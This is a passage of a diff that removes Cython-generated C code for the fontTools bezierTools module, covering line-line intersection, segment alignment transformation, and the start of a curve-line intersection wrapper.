- * if _both_points_are_on_same_side_of_origin( - * pt, e1, s1 - */ - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1213, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_x)) __PYX_ERR(0, 1213, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y); - __Pyx_GIVEREF(__pyx_v_y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_y)) __PYX_ERR(0, 1213, __pyx_L1_error); - __pyx_v_pt = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1214 - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) - * if _both_points_are_on_same_side_of_origin( # <<<<<<<<<<<<<< - * pt, e1, s1 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_both_points_are_on_same_side_of); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1214, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - - /* "fontTools/misc/bezierTools.py":1215 - * pt = (x, y) - * if _both_points_are_on_same_side_of_origin( - * pt, e1, s1 # <<<<<<<<<<<<<< - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - * return [ - */ - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_2, __pyx_v_pt, __pyx_v_e1, __pyx_v_s1}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1214, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - - /* "fontTools/misc/bezierTools.py":1214 - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) - * if _both_points_are_on_same_side_of_origin( # <<<<<<<<<<<<<< - * pt, e1, s1 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - */ - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1214, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_7) { - } else { - __pyx_t_5 = __pyx_t_7; - goto __pyx_L29_bool_binop_done; - } - - /* "fontTools/misc/bezierTools.py":1216 - * if _both_points_are_on_same_side_of_origin( - * pt, e1, s1 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): # <<<<<<<<<<<<<< - * return [ - * Intersection( - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_both_points_are_on_same_side_of); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1216, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_2, __pyx_v_pt, __pyx_v_s2, __pyx_v_e2}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1216, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1216, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_5 = __pyx_t_7; - __pyx_L29_bool_binop_done:; - - /* "fontTools/misc/bezierTools.py":1214 - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) - * if _both_points_are_on_same_side_of_origin( # <<<<<<<<<<<<<< - * pt, e1, s1 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - */ - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1217 - * pt, e1, s1 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - * return [ # <<<<<<<<<<<<<< - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - */ - __Pyx_XDECREF(__pyx_r); - - /* "fontTools/misc/bezierTools.py":1218 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - * return [ - * Intersection( # <<<<<<<<<<<<<< - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_Intersection); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1218, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - - /* "fontTools/misc/bezierTools.py":1219 - * return [ - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) # <<<<<<<<<<<<<< - * ) - * ] - */ - __pyx_t_3 = __Pyx_PyDict_NewPresized(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_pt, __pyx_v_pt) < 0) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_line_t_of_pt); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_10 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_9))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_9); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_9); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_9, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_10, __pyx_v_s1, __pyx_v_e1, __pyx_v_pt}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_9, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - } - if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_t1, __pyx_t_2) < 0) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_line_t_of_pt); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_10 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_9))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_9); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_9); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_9, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_10, __pyx_v_s2, __pyx_v_e2, __pyx_v_pt}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_9, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - } - if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_t2, __pyx_t_2) < 0) __PYX_ERR(0, 1219, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1218 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - * return [ - * Intersection( # <<<<<<<<<<<<<< - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - * ) - */ - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_empty_tuple, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1218, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1217 - * pt, e1, s1 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - * return [ # <<<<<<<<<<<<<< - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - */ - __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1217, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_3, 0, __pyx_t_2)) __PYX_ERR(0, 1217, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1214 - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) - * if _both_points_are_on_same_side_of_origin( # <<<<<<<<<<<<<< - * pt, e1, s1 - * ) and _both_points_are_on_same_side_of_origin(pt, s2, e2): - */ - } - - /* "fontTools/misc/bezierTools.py":1222 - * ) - * ] - * return [] # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_3 = PyList_New(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1222, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1147 - * - * - * def lineLineIntersections(s1, e1, s2, e2): # <<<<<<<<<<<<<< - * """Finds intersections between two line segments. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_AddTraceback("fontTools.misc.bezierTools.lineLineIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_s1x); - __Pyx_XDECREF(__pyx_v_s1y); - __Pyx_XDECREF(__pyx_v_e1x); - __Pyx_XDECREF(__pyx_v_e1y); - __Pyx_XDECREF(__pyx_v_s2x); - __Pyx_XDECREF(__pyx_v_s2y); - __Pyx_XDECREF(__pyx_v_e2x); - __Pyx_XDECREF(__pyx_v_e2y); - __Pyx_XDECREF(__pyx_v_x); - __Pyx_XDECREF(__pyx_v_slope34); - __Pyx_XDECREF(__pyx_v_y); - __Pyx_XDECREF(__pyx_v_pt); - __Pyx_XDECREF(__pyx_v_slope12); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1225 - * - * - * def _alignment_transformation(segment): # <<<<<<<<<<<<<< - * # Returns a transformation which aligns a segment horizontally at the - * # origin. Apply this transformation to curves and root-find to find - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_75_alignment_transformation(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_74_alignment_transformation, "_alignment_transformation(segment)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_75_alignment_transformation = {"_alignment_transformation", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_75_alignment_transformation, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_74_alignment_transformation}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_75_alignment_transformation(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_segment = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[1] = {0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_alignment_transformation (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_segment,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_segment)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1225, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_alignment_transformation") < 0)) __PYX_ERR(0, 1225, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 1)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - } - __pyx_v_segment = values[0]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_alignment_transformation", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 1225, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._alignment_transformation", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_74_alignment_transformation(__pyx_self, __pyx_v_segment); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_74_alignment_transformation(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_segment) { - PyObject *__pyx_v_start = NULL; - PyObject *__pyx_v_end = NULL; - PyObject *__pyx_v_angle = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_t_7; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_alignment_transformation", 1); - - /* "fontTools/misc/bezierTools.py":1229 - * # origin. Apply this transformation to curves and root-find to find - * # intersections with the segment. - * start = segment[0] # <<<<<<<<<<<<<< - * end = segment[-1] - * angle = math.atan2(end[1] - start[1], end[0] - start[0]) - */ - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_segment, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1229, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_start = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1230 - * # intersections with the segment. - * start = segment[0] - * end = segment[-1] # <<<<<<<<<<<<<< - * angle = math.atan2(end[1] - start[1], end[0] - start[0]) - * return Identity.rotate(-angle).translate(-start[0], -start[1]) - */ - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_segment, -1L, long, 1, __Pyx_PyInt_From_long, 0, 1, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1230, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_end = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1231 - * start = segment[0] - * end = segment[-1] - * angle = math.atan2(end[1] - start[1], end[0] - start[0]) # <<<<<<<<<<<<<< - * return Identity.rotate(-angle).translate(-start[0], -start[1]) - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_math); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_atan2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_end, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_start, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = PyNumber_Subtract(__pyx_t_2, __pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_end, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_start, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_6 = PyNumber_Subtract(__pyx_t_4, __pyx_t_2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_7 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_t_5, __pyx_t_6}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_7, 2+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1231, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_v_angle = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1232 - * end = segment[-1] - * angle = math.atan2(end[1] - start[1], end[0] - start[0]) - * return Identity.rotate(-angle).translate(-start[0], -start[1]) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_Identity); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_6, __pyx_n_s_rotate); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = PyNumber_Negative(__pyx_v_angle); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_2 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_5))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_5); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_5, function); - __pyx_t_7 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_2, __pyx_t_6}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_7, 1+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } - __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_translate); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_start, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = PyNumber_Negative(__pyx_t_3); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_start, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Negative(__pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (likely(PyMethod_Check(__pyx_t_5))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_5); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_5, function); - __pyx_t_7 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_t_6, __pyx_t_2}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_7, 2+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1232, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1225 - * - * - * def _alignment_transformation(segment): # <<<<<<<<<<<<<< - * # Returns a transformation which aligns a segment horizontally at the - * # origin. Apply this transformation to curves and root-find to find - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools._alignment_transformation", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_start); - __Pyx_XDECREF(__pyx_v_end); - __Pyx_XDECREF(__pyx_v_angle); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1235 - * - * - * def _curve_line_intersections_t(curve, line): # <<<<<<<<<<<<<< - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_77_curve_line_intersections_t(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_76_curve_line_intersections_t, "_curve_line_intersections_t(curve, line)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_77_curve_line_intersections_t = {"_curve_line_intersections_t", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_77_curve_line_intersections_t, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_76_curve_line_intersections_t}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_77_curve_line_intersections_t(PyObject *__pyx_self, -#if 